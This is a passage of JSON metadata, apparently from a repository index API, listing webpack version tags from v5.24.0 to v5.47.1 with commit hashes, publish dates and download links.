"pkg:github/webpack/webpack@v5.47.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1/manifests"},{"name":"v5.47.0","sha":"efeb1287e52870036cc01b22476852205e99c31a","kind":"tag","published_at":"2021-07-27T14:27:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0/manifests"},{"name":"v5.46.0","sha":"a32b0fd041260f3303b9329c9a65cc4afe102390","kind":"tag","published_at":"2021-07-22T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0/manifests"},{"name":"v5.45.1","sha":"7102df3bb52a33529ff5db4fdf34484d2a359a49","kind":"tag","published_at":"2021-07-16T20:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1/manifests"},{"name":"v5.45.0","sha":"db52c58a4fb037ece22be6365f56c11bc78fb426","kind":"tag","published_at":"2021-07-16T15:50:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0/manifests"},{"name":"v5.44.0","sha":"f20158d4492e73d07a36cd1614dfbd1dc1ea143d","kind":"tag","published_at":"2021-07-08T19:37:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0/manifests"},{"name":"v5.43.0","sha":"b53a06437a3e8b2756c550c1be6ccb33fdba03d7","kind":"tag","published_at":"2021-07-06T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0/manifests"},{"name":"v5.42.1","sha":"4156b20644d309c0e8acaa1e22ca3a4fe546c0b6","kind":"tag","published_at":"2021-07-05T14:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1/manifests"},{"name":"v5.42.0","sha":"4fb45402eec7efe1c70e641cab7b24331948ea8d","kind":"tag","published_at":"2021-07-02T07:04:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0/manifests"},{"name":"v5.41.1","sha":"9ed05afbeaf87442d86863a20a6c30b0ab437fb5","kind":"tag","published_at":"2021-06-29T14:30:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1/manifests"},{"name":"v5.41.0","sha":"fd5dc9997671b4c4b32d15f722e06079cd5da2db","kind":"tag","published_at":"2021-06-28T16:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0/manifests"},{"name":"v5.40.0","sha":"5d297327bc1f208de16c29f5c9b31d2b8a06bce4","kind":"tag","published_at":"2021-06-21T16:25:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0/manifests"},{"name":"v5.39.1","sha":"e5ccd070f6c18794173d3f2e60445de5bc2f52a2","kind":"tag","published_at":"2021-06-17T10:21:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1/manifests"},{"name":"v5.39.0","sha":"e9f90450d5d8b4e796e5e0e9674869220ab73bcb","kind":"tag","published_at":"2021-06-14T21:31:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0/manifests"},{"name":"v5.38.1","sha":"487665cb69f7b1f1aac44097124ef8f33cfe247b","kind":"tag","published_at":"2021-05-27T21:12:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1/manifests"},{"name":"v5.38.0","sha":"daa0f1ed1cebc28c8cc9034f95f3b56e9253ec5e","kind":"tag","published_at":"2021-05-27T12:41:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0/manifests"},{"name":"v5.37.1","sha":"2a5ed4a2dcbe06e852f84a8e7f63145af87cb139","kind":"tag","published_at":"2021-05-19T06:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1/manifests"},{"name":"v5.37.0","sha":"a5821c74568d59a330043900328a018c5d3a4af7","kind":"tag","published_at":"2021-05-10T16:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0/manifests"},{"name":"v5.36.2","sha":"0e2e972a2d181c530bb7185278fe5cfc20724c22","kind":"tag","published_at":"2021-04-30T11:48:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2/manifests"},{"name":"v5.36.1","sha":"e9de77aae42bd8f7d799a21dd16c98206cd170f6","kind":"tag","published_at":"2021-04-28T18:57:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1/manifests"},{"name":"v5.36.0","sha":"c0a3394ae059ba30c90b7e84c3805dcfd918577d","kind":"tag","published_at":"2021-04-27T09:44:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0/manifests"},{"name":"v5.35.1","sha":"ed175cd22f89eb9fecd0a70572a3fd0be028e77c","kind":"tag","published_at":"2021-04-23T18:36:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1/manifests"},{"name":"v5.35.0","sha":"e05935f8969d873a20762767d348256e5ad8fb46","kind":"tag","published_at":"2021-04-21T06:37:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0/manifests"},{"name":"v5.34.0","sha":"a52263b4537dc5bd954677fc884966b0c11114d4","kind":"tag","published_at":"2021-04-19T14:42:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0/manifests"},{"name":"v5.33.2","sha":"93ce24d2dc40ee972a2ea5138f3c181563c913fd","kind":"tag","published_at":"2021-04-14T18:31:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2/manifests"},{"name":"v5.33.1","sha":"7a7d3be25a3db94cb47923d122513726966025cf","kind":"tag","published_at":"2021-04-14T18:08:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1/manifests"},{"name":"v5.33.0","sha":"7ee3bab88a5f38d4a6356baf93a8c9dfb901b9dc","kind":"tag","published_at":"2021-04-14T17:28:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0/manifests"},{"name":"v5.32.0","sha":"932950550c85dce4efcaccd7116b4879bfd5f962","kind":"tag","published_at":"2021-04-12T18:54:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0/manifests"},{"name":"v5.31.2","sha":"cde1b73e12eb8a77eb9ba42e7920c9ec5d29c2c9","kind":"tag","published_at":"2021-04-09T17:52:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2/manifests"},{"name":"v5.31.1","sha":"34502650252c1f5e2b6e19f3d5afd1fac96f3ec4","kind":"tag","published_at":"2021-04-09T17:07:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1/manifests"},{"name":"v5.31.0","sha":"b3e26cb5a81087c1b4eadb2e648eb01928c9b3be","kind":"tag","published_at":"2021-04-07T16:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0/manifests"},{"name":"v5.30.0","sha":"f3dce69e9df5f778fb4850662b0f16f9fd9951d2","kind":"tag","published_at":"2021-04-01T18:45:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0/manifests"},{"name":"v5.29.0","sha":"0522deb7618636b37acae64f5e3b581c7bbb8fca","kind":"tag","published_at":"2021-04-01T15:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0/manifests"},{"name":"v5.28.0","sha":"15110ea6de0b53c93d697716d17037c41a3c0cd2","kind":"tag","published_at":"2021-03-24T12:35:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0/manifests"},{"name":"v5.27.2","sha":"1c044bc75be02fcfe78eb6a291f2d107f8ac58eb","kind":"tag","published_at":"2021-03-22T14:40:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2/manifests"},{"name":"v5.27.1","sha":"69d4e174b96f197ef5d9d8396edaa25178f22725","kind":"tag","published_at":"2021-03-20T19:39:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1/manifests"},{"name":"v5.27.0","sha":"807e69d9647e8605daa815b6b24df8baebaa59b9","kind":"tag","published_at":"2021-03-19T16:46:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0/manifests"},{"name":"v5.26.3","sha":"4ea8a435ace96cc6fe5c9b741bc14b68d75624a4","kind":"tag","published_at":"2021-03-17T13:38:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3/manifests"},{"name":"v5.26.2","sha":"c67a73abbc3d3b333b31480bd7ac7a50e8b49e3e","kind":"tag","published_at":"2021-03-16T19:55:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2/manifests"},{"name":"v5.26.1","sha":"ee09a9609bdebc25e52e785cef56f9698805599d","kind":"tag","published_at":"2021-03-16T14:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1/manifests"},{"name":"v5.26.0","sha":"1def19ea8ab9921d1adaed30ba8f928badb133b5","kind":"tag","published_at":"2021-03-15T16:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0/manifests"},{"name":"v5.25.1","sha":"58dfda2796edc57c9d18526053d6bcde6f06b8b7","kind":"tag","published_at":"2021-03-14T19:33:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1/manifests"},{"name":"v5.25.0","sha":"be352e86b1c88893a62ffc2ada1c9294a016f5db","kind":"tag","published_at":"2021-03-12T07:49:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0/manifests"},{"name":"v5.24.4","sha":"ef5e68141dc0fb6d02aa022194506cda878392c1","kind":"tag","published_at":"2021-03-08T09:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4/manifests"},{"name":"v5.24.3","sha":"d044c857305fb48693bfa961bec3485d82ddef41","kind":"tag","published_at":"2021-03-03T19:07:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3/manifests"},{"name":"v5.24.2","sha":"04a7d052b5c04628257ec23244f234622c7f394c","kind":"tag","published_at":"2021-02-24T20:20:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2/manifests"},{"name":"v5.24.1","sha":"3849f45961c60d4bea91b4ef43bb7da7992a0c3a","kind":"tag","published_at":"2021-02-23T21:56:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1/manifests"},{"name":"v5.24.0","sha":"63c14ccbfc6698cb974f8469e0a829ae1d8f44ec","kind":"tag","published_at":"2021-02-22T22:32:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/G